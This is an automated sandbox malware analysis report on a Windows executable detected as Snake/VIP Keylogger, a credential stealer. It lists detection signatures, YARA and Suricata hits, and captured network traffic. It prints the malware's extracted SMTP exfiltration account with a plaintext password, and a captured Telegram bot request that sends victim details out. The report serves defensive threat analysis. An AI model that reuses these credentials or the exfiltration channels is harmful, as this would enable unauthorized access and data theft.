Edit tour

Windows Analysis Report
3c638k0NJx.exe

Overview

General Information

Sample name:	3c638k0NJx.exe renamed because original name is a hash value
Original sample name:	be07e84c6e955637d9c0178a6fcd8318bd57e4a229da1eed74d0adf3b3d72afc.exe
Analysis ID:	1632228
MD5:	8aa3715cd21b5241b60d0f4087fd5408
SHA1:	d3b9f5b030220ab2fcf787371f792399a64a4fe4
SHA256:	be07e84c6e955637d9c0178a6fcd8318bd57e4a229da1eed74d0adf3b3d72afc
Tags:	exeSnakeKeyloggeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

Binary is likely a compiled AutoIt script file

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Sample uses string decryption to hide its real strings

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

3c638k0NJx.exe (PID: 7156 cmdline: "C:\Users\user\Desktop\3c638k0NJx.exe" MD5: 8AA3715CD21B5241B60D0F4087FD5408)

RegSvcs.exe (PID: 6320 cmdline: "C:\Users\user\Desktop\3c638k0NJx.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "info@paidhafm.com", "Password": "stpmAee7", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "info@paidhafm.com", "Password": "stpmAee7", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.3355927662.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.885590398.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.885590398.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.885590398.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.885590398.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e28e:$a1: get_encryptedPassword 0x2e5b7:$a2: get_encryptedUsername 0x2e09e:$a3: get_timePasswordChanged 0x2e1a7:$a4: get_passwordField 0x2e2a4:$a5: set_encryptedPassword 0x2f945:$a7: get_logins 0x2f8a8:$a10: KeyLoggerEventArgs 0x2f50d:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.885590398.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c046:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b6e9:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b946:$a4: \Orbitum\User Data\Default\Login Data 0x3c325:$a5: \Kometa\User Data\Default\Login Data
00000000.00000002.885590398.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2eeb0:$s1: UnHook 0x2eeb7:$s2: SetHook 0x2eebf:$s3: CallNextHook 0x2eecc:$s4: _hook
00000001.00000002.3353910246.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.3353910246.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000001.00000002.3353910246.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.3353910246.0000000000402000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e08e:$a1: get_encryptedPassword 0x2e3b7:$a2: get_encryptedUsername 0x2de9e:$a3: get_timePasswordChanged 0x2dfa7:$a4: get_passwordField 0x2e0a4:$a5: set_encryptedPassword 0x2f745:$a7: get_logins 0x2f6a8:$a10: KeyLoggerEventArgs 0x2f30d:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: 3c638k0NJx.exe PID: 7156	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 3c638k0NJx.exe PID: 7156	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: 3c638k0NJx.exe PID: 7156	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: 3c638k0NJx.exe PID: 7156	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12359c:$a1: get_encryptedPassword 0x1238bb:$a2: get_encryptedUsername 0x1233b6:$a3: get_timePasswordChanged 0x1234bf:$a4: get_passwordField 0x1235b2:$a5: set_encryptedPassword 0x125a90:$a7: get_logins 0x1259f3:$a10: KeyLoggerEventArgs 0x12565c:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 6320	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 6320	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 6320	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 6320	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x6152b:$a1: get_encryptedPassword 0x6184a:$a2: get_encryptedUsername 0x61345:$a3: get_timePasswordChanged 0x6144e:$a4: get_passwordField 0x61541:$a5: set_encryptedPassword 0x63a1f:$a7: get_logins 0x63982:$a10: KeyLoggerEventArgs 0x635eb:$a11: KeyLoggerEventArgsEventHandler
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e28e:$a1: get_encryptedPassword 0x2e5b7:$a2: get_encryptedUsername 0x2e09e:$a3: get_timePasswordChanged 0x2e1a7:$a4: get_passwordField 0x2e2a4:$a5: set_encryptedPassword 0x2f945:$a7: get_logins 0x2f8a8:$a10: KeyLoggerEventArgs 0x2f50d:$a11: KeyLoggerEventArgsEventHandler
1.2.RegSvcs.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c046:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b6e9:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b946:$a4: \Orbitum\User Data\Default\Login Data 0x3c325:$a5: \Kometa\User Data\Default\Login Data
1.2.RegSvcs.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2eeb0:$s1: UnHook 0x2eeb7:$s2: SetHook 0x2eebf:$s3: CallNextHook 0x2eecc:$s4: _hook
0.2.3c638k0NJx.exe.da0000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.3c638k0NJx.exe.da0000.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.3c638k0NJx.exe.da0000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.3c638k0NJx.exe.da0000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c48e:$a1: get_encryptedPassword 0x2c7b7:$a2: get_encryptedUsername 0x2c29e:$a3: get_timePasswordChanged 0x2c3a7:$a4: get_passwordField 0x2c4a4:$a5: set_encryptedPassword 0x2db45:$a7: get_logins 0x2daa8:$a10: KeyLoggerEventArgs 0x2d70d:$a11: KeyLoggerEventArgsEventHandler
0.2.3c638k0NJx.exe.da0000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a246:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x398e9:$a3: \Google\Chrome\User Data\Default\Login Data 0x39b46:$a4: \Orbitum\User Data\Default\Login Data 0x3a525:$a5: \Kometa\User Data\Default\Login Data
0.2.3c638k0NJx.exe.da0000.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d0b0:$s1: UnHook 0x2d0b7:$s2: SetHook 0x2d0bf:$s3: CallNextHook 0x2d0cc:$s4: _hook
0.2.3c638k0NJx.exe.da0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.3c638k0NJx.exe.da0000.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.3c638k0NJx.exe.da0000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.3c638k0NJx.exe.da0000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e28e:$a1: get_encryptedPassword 0x2e5b7:$a2: get_encryptedUsername 0x2e09e:$a3: get_timePasswordChanged 0x2e1a7:$a4: get_passwordField 0x2e2a4:$a5: set_encryptedPassword 0x2f945:$a7: get_logins 0x2f8a8:$a10: KeyLoggerEventArgs 0x2f50d:$a11: KeyLoggerEventArgsEventHandler
0.2.3c638k0NJx.exe.da0000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c046:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b6e9:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b946:$a4: \Orbitum\User Data\Default\Login Data 0x3c325:$a5: \Kometa\User Data\Default\Login Data
0.2.3c638k0NJx.exe.da0000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2eeb0:$s1: UnHook 0x2eeb7:$s2: SetHook 0x2eebf:$s3: CallNextHook 0x2eecc:$s4: _hook
Click to see the 13 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 208.91.199.224, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 6320, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49704

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T21:16:04.312803+0100	2803305	3	Unknown Traffic	192.168.2.7	49683	104.21.96.1	443	TCP
2025-03-07T21:16:11.906324+0100	2803305	3	Unknown Traffic	192.168.2.7	49687	104.21.96.1	443	TCP
2025-03-07T21:16:14.805210+0100	2803305	3	Unknown Traffic	192.168.2.7	49689	104.21.96.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T21:15:57.873835+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49681	158.101.44.242	80	TCP
2025-03-07T21:16:02.123875+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49681	158.101.44.242	80	TCP
2025-03-07T21:16:05.983317+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49684	158.101.44.242	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T21:16:32.989754+0100	1810007	1	Potentially Bad Traffic	192.168.2.7	49698	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 3c638k0NJx.exe

Avira: detected

Found malware configuration

Source: 00000001.00000002.3355927662.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@paidhafm.com", "Password": "stpmAee7", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}
Source: 00000001.00000002.3355927662.0000000002C11000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@paidhafm.com", "Password": "stpmAee7", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: 3c638k0NJx.exe	Virustotal: Detection: 70%			Perma Link
Source: 3c638k0NJx.exe	ReversingLabs: Detection: 65%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 0.2.3c638k0NJx.exe.da0000.1.unpack	String decryptor: info@paidhafm.com
Source: 0.2.3c638k0NJx.exe.da0000.1.unpack	String decryptor: stpmAee7
Source: 0.2.3c638k0NJx.exe.da0000.1.unpack	String decryptor: us2.smtp.mailhostbox.com
Source: 0.2.3c638k0NJx.exe.da0000.1.unpack	String decryptor: 587
Source: 0.2.3c638k0NJx.exe.da0000.1.unpack	String decryptor:

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: 3c638k0NJx.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.7:49682 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49698 version: TLS 1.2

Source:	Binary string: wntdll.pdbUGP source: 3c638k0NJx.exe, 00000000.00000003.881774733.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, 3c638k0NJx.exe, 00000000.00000003.883384927.0000000003850000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 3c638k0NJx.exe, 00000000.00000003.881774733.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, 3c638k0NJx.exe, 00000000.00000003.883384927.0000000003850000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C9445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00C9445A
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C9C6D1 FindFirstFileW,FindClose,	0_2_00C9C6D1
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C9C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00C9C75C
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C9EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C9EF95
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C9F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C9F0F2
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C9F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C9F3F3
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C937EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00C937EF
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C93B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00C93B12
Source: C:\Users\user\Desktop\3c638k0NJx.exe	Code function: 0_2_00C9BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C9BCBC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 014AF45Dh	1_2_014AF2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 014AF45Dh	1_2_014AF4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 014AFC19h	1_2_014AF961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 063C2D41h	1_2_063C2A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 063C3308h	1_2_063C2EF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 063C3308h	1_2_063C3236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 063CD4C1h	1_2_063CD218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 063CD919h	1_2_063CD670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	1_2_063C0673
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 063CDD71h	1_2_063CDAC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 063C0D0Dh	1_2_063C0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 063C16F8h	1_2_063C0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 063CE1C9h	1_2_063CDF20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 063CE621h	1_2_063CE378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 063CEA79h	1_2_063CE7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 063CEED1h	1_2_063CEC28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	1_2_063C0853
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	1_2_063C0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 063CF329h	1_2_063CF080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 063CF781h	1_2_063CF4D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 063CFBD9h	1_2_063CF930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 063CD069h	1_2_063CCDC0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49698 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.7:49704 -> 208.91.199.224:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2009/03/2025%20/%2005:28:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1
Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49684 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49681 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49687 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49683 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49689 -> 104.21.96.1:443

Source: global traffic

TCP traffic: 192.168.2.7:49704 -> 208.91.199.224:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.7:49682 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\3c638k0NJx.exe

Code function: 0_2_00CA22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00CA22EE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
